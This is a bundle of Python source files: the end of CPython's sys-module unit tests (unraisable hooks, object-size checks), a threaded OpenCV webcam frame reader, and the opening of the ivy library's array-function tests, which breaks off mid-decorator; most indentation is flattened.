sys.__unraisablehook__):
expected = self.write_unraisable_exc(
A.B.X(), "msg", "obj");
report = stderr.getvalue()
self.assertIn(A.B.X.__qualname__, report)
if moduleName in ['builtins', '__main__']:
self.assertNotIn(moduleName + '.', report)
else:
self.assertIn(moduleName + '.', report)
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('6Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('6Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('6Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('6Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
def func():
return sys._getframe()
x = func()
check(x, size('3Pi3c8P2iciP'))
# function
def func(): pass
check(func, size('14Pi'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2P4P4c8P2iciP'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('5Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn12PIP'
s = vsize('2P' + fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'4P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'6P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 32 + 21*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 15*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 32 + 21*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 13*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
VideoGet.py
|
from threading import Thread
import cv2
class VideoGet:
"""
Class that continuously gets frames from a VideoCapture object
with a dedicated thread.
"""
def __init__(self, src=0):
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
def start(self):
Thread(target=self.get, args=()).start()
return self
def get(self):
while not self.stopped:
if not self.grabbed:
self.stop()
else:
cv2.waitKey(5)
(self.grabbed, self.frame) = self.stream.read()
def stop(self):
self.stopped = True
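# Minimal usage sketch (not part of the original class); assumes a local webcam at index 0
# and an OpenCV build with GUI support:
if __name__ == "__main__":
    getter = VideoGet(0).start()
    while not getter.stopped:
        # show the most recently grabbed frame; quit on 'q' or when the stream ends
        cv2.imshow("frame", getter.frame)
        if cv2.waitKey(1) == ord("q"):
            getter.stop()
            break
    cv2.destroyAllWindows()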
|
test_general.py
|
"""
Collection of tests for unified general functions
"""
# global
import os
import math
import time
import einops
import pytest
import threading
import numpy as np
from numbers import Number
from collections.abc import Sequence
import torch.multiprocessing as multiprocessing
# local
import ivy
import ivy.functional.backends.numpy
import ivy.functional.backends.jax
import ivy.functional.backends.tensorflow
import ivy.functional.backends.torch
import ivy.functional.backends.mxnet
import ivy_tests.test_ivy.helpers as helpers
# Helpers #
# --------#
def _get_shape_of_list(lst, shape=()):
if not lst:
return []
if not isinstance(lst, Sequence):
return shape
if isinstance(lst[0], Sequence):
l = len(lst[0])
if not all(len(item) == l for item in lst):
msg = 'not all lists have the same length'
raise ValueError(msg)
shape += (len(lst),)
shape = _get_shape_of_list(lst[0], shape)
return shape
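# e.g. _get_shape_of_list([[1, 2], [3, 4], [5, 6]]) returns (3, 2)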
# Tests #
# ------#
# set_framework
@pytest.mark.parametrize(
"fw_str", ['numpy', 'jax', 'torch', 'mxnet'])
def test_set_framework(fw_str, dev, call):
ivy.set_framework(fw_str)
ivy.unset_framework()
# use_framework
def test_use_within_use_framework(dev, call):
with ivy.functional.backends.numpy.use:
pass
with ivy.functional.backends.jax.use:
pass
with ivy.functional.backends.tensorflow.use:
pass
with ivy.functional.backends.torch.use:
pass
with ivy.functional.backends.mxnet.use:
pass
@pytest.mark.parametrize(
"allow_duplicates", [True, False])
def test_match_kwargs(allow_duplicates):
def func_a(a, b, c=2):
pass
func_b = lambda a, d, e=5: None
class ClassA:
def __init__(self, c, f, g=3):
pass
kwargs = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6}
kwfa, kwfb, kwca = ivy.match_kwargs(kwargs, func_a, func_b, ClassA, allow_duplicates=allow_duplicates)
if allow_duplicates:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'a': 0, 'd': 3, 'e': 4}
assert kwca == {'c': 2, 'f': 5, 'g': 6}
else:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'d': 3, 'e': 4}
assert kwca == {'f': 5, 'g': 6}
# def test_get_referrers_recursive(dev, call):
#
# class SomeClass:
# def __init__(self):
# self.x = [1, 2]
# self.y = [self.x]
#
# some_obj = SomeClass()
# refs = ivy.get_referrers_recursive(some_obj.x)
# ref_keys = refs.keys()
# assert len(ref_keys) == 3
# assert 'repr' in ref_keys
# assert refs['repr'] == '[1,2]'
# y_id = str(id(some_obj.y))
# y_refs = refs[y_id]
# assert y_refs['repr'] == '[[1,2]]'
# some_obj_dict_id = str(id(some_obj.__dict__))
# assert y_refs[some_obj_dict_id] == 'tracked'
# dict_refs = refs[some_obj_dict_id]
# assert dict_refs['repr'] == "{'x':[1,2],'y':[[1,2]]}"
# some_obj_id = str(id(some_obj))
# some_obj_refs = dict_refs[some_obj_id]
# assert some_obj_refs['repr'] == str(some_obj).replace(' ', '')
# assert len(some_obj_refs) == 1
# array
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"from_numpy", [True, False])
def test_array(object_in, dtype, from_numpy, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# to numpy
if from_numpy:
object_in = np.array(object_in)
# smoke test
ret = ivy.array(object_in, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(call(ivy.array, object_in, dtype, dev), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
# copy array
@pytest.mark.parametrize(
"x", [[0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_copy_array(x, dtype, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# smoke test
x = ivy.array(x, dtype, dev)
ret = ivy.copy_array(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(x))
assert id(x) != id(ret)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
# array_equal
@pytest.mark.parametrize(
"x0_n_x1_n_res", [([0.], [0.], True), ([0.], [1.], False),
([[0.], [1.]], [[0.], [1.]], True),
([[0.], [1.]], [[1.], [2.]], False)])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_array_equal(x0_n_x1_n_res, dtype, dev, call):
if call in [helpers.mx_call] and dtype in ['int16', 'bool']:
# mxnet does not support int16, nor bool for the broadcast_equal method used here
pytest.skip()
x0, x1, true_res = x0_n_x1_n_res
# smoke test
x0 = ivy.array(x0, dtype, dev)
x1 = ivy.array(x1, dtype, dev)
res = ivy.array_equal(x0, x1)
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# arrays_equal
@pytest.mark.parametrize(
"xs_n_res", [([[[0.], [1.]], [[0.], [1.]], [[1.], [2.]]], False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
def test_arrays_equal(xs_n_res, dtype, dev, call):
xs, true_res = xs_n_res
# smoke test
x0 = ivy.array(xs[0], dtype, dev)
x1 = ivy.array(xs[1], dtype, dev)
x2 = ivy.array(xs[2], dtype, dev)
res = ivy.arrays_equal([x0, x1, x2])
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert ivy.is_array(x2)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# equal
@pytest.mark.parametrize(
"x0_n_x1_n_x2_em_n_res", [([0.], [0.], [0.], False, True),
([0.], [1.], [0.], False, False),
([0.], [1.], [0.], True, [[True, False, True],
[False, True, False],
[True, False, True]]),
({'a': 0}, {'a': 0}, {'a': 1}, True, [[True, True, False],
[True, True, False],
[False, False, True]])])
@pytest.mark.parametrize(
"to_array", [True, False])
def test_equal(x0_n_x1_n_x2_em_n_res, to_array, dev, call):
x0, x1, x2, equality_matrix, true_res = x0_n_x1_n_x2_em_n_res
# smoke test
if isinstance(x0, list) and to_array:
x0 = ivy.array(x0, dev=dev)
x1 = ivy.array(x1, dev=dev)
x2 = ivy.array(x2, dev=dev)
res = ivy.all_equal(x0, x1, x2, equality_matrix=equality_matrix)
# value test
if equality_matrix:
assert np.array_equal(ivy.to_numpy(res), np.array(true_res))
else:
assert res == true_res
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support variable number of input arguments
return
# to_numpy
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_numpy(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_numpy() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_numpy(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, np.ndarray)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(ivy.to_numpy(tensor_fn(object_in, dtype, dev)), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
# to_scalar
@pytest.mark.parametrize(
"object_in", [[0.], [[[1]]], [True], [[1.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_scalar(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_scalar() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_scalar(tensor_fn(object_in, dtype, dev))
true_val = ivy.to_numpy(ivy.array(object_in, dtype=dtype)).item()
# type test
assert isinstance(ret, type(true_val))
# value test
assert ivy.to_scalar(tensor_fn(object_in, dtype, dev)) == true_val
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support scalar conversion
return
# to_list
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_list(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_list(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, list)
# cardinality test
assert _get_shape_of_list(ret) == _get_shape_of_list(object_in)
# value test
assert np.allclose(np.asarray(ivy.to_list(tensor_fn(object_in, dtype, dev))),
np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support list conversion
return
# shape
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_shape(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.shape(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, tuple)
ret = ivy.array(ret)
# cardinality test
assert ret.shape[0] == len(np.asarray(object_in).shape)
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(np.asarray(object_in).shape, np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# get_num_dims
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_get_num_dims(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.get_num_dims(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, int)
ret = ivy.array(ret)
# cardinality test
assert list(ret.shape) == []
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(len(np.asarray(object_in).shape), np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# minimum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_minimum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.minimum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.minimum, x, y), np.asarray(ivy.functional.backends.numpy.minimum(ivy.to_numpy(x), ivy.to_numpy(y))))
# maximum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_maximum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.maximum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.maximum, x, y), np.asarray(ivy.functional.backends.numpy.maximum(ivy.to_numpy(x), ivy.to_numpy(y))))
# clip
@pytest.mark.parametrize(
"x_min_n_max", [(-0.5, 0., 1.5), ([1.7], [0.5], [1.1]), ([[0.8, 2.2], [1.5, 0.2]], 0.2, 1.4),
([[0.8, 2.2], [1.5, 0.2]], [[1., 1.], [1., 1.]], [[1.1, 2.], [1.1, 2.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_clip(x_min_n_max, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_min_n_max[0], Number) or isinstance(x_min_n_max[1], Number) or isinstance(x_min_n_max[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_min_n_max[0], dtype, dev)
min_val = tensor_fn(x_min_n_max[1], dtype, dev)
max_val = tensor_fn(x_min_n_max[2], dtype, dev)
if ((min_val.shape != [] and min_val.shape != [1]) or (max_val.shape != [] and max_val.shape != [1]))\
and call in [helpers.mx_call]:
# mxnet clip only accepts scalars or 0- or 1-dimensional arrays for the min and max bounds
pytest.skip()
ret = ivy.clip(x, min_val, max_val)
# type test
assert ivy.is_array(ret)
# cardinality test
max_shape = max([x.shape, min_val.shape, max_val.shape], key=lambda x_: len(x_))
assert ret.shape == max_shape
# value test
assert np.array_equal(call(ivy.clip, x, min_val, max_val),
np.asarray(ivy.functional.backends.numpy.clip(ivy.to_numpy(x), ivy.to_numpy(min_val), ivy.to_numpy(max_val))))
# clip_vector_norm
# @pytest.mark.parametrize(
# "x_max_norm_n_p_val_clipped",
# [(-0.5, 0.4, 2., -0.4), ([1.7], 1.5, 3., [1.5]),
# ([[0.8, 2.2], [1.5, 0.2]], 4., 1., [[0.6808511, 1.8723406], [1.2765958, 0.17021278]]),
# ([[0.8, 2.2], [1.5, 0.2]], 2.5, 2., [[0.71749604, 1.9731141], [1.345305, 0.17937401]])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_clip_vector_norm(x_max_norm_n_p_val_clipped, dtype, tensor_fn, dev, call):
# # smoke test
# if call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x_max_norm_n_p_val_clipped[0], dtype, dev)
# max_norm = x_max_norm_n_p_val_clipped[1]
# p_val = x_max_norm_n_p_val_clipped[2]
# clipped = x_max_norm_n_p_val_clipped[3]
# ret = ivy.clip_vector_norm(x, max_norm, p_val)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == (x.shape if len(x.shape) else (1,))
# # value test
# assert np.allclose(call(ivy.clip_vector_norm, x, max_norm, p_val), np.array(clipped))
# # compilation test
# if call is helpers.torch_call:
# # pytorch jit cannot compile global variables, in this case MIN_DENOMINATOR
# return
# round
@pytest.mark.parametrize(
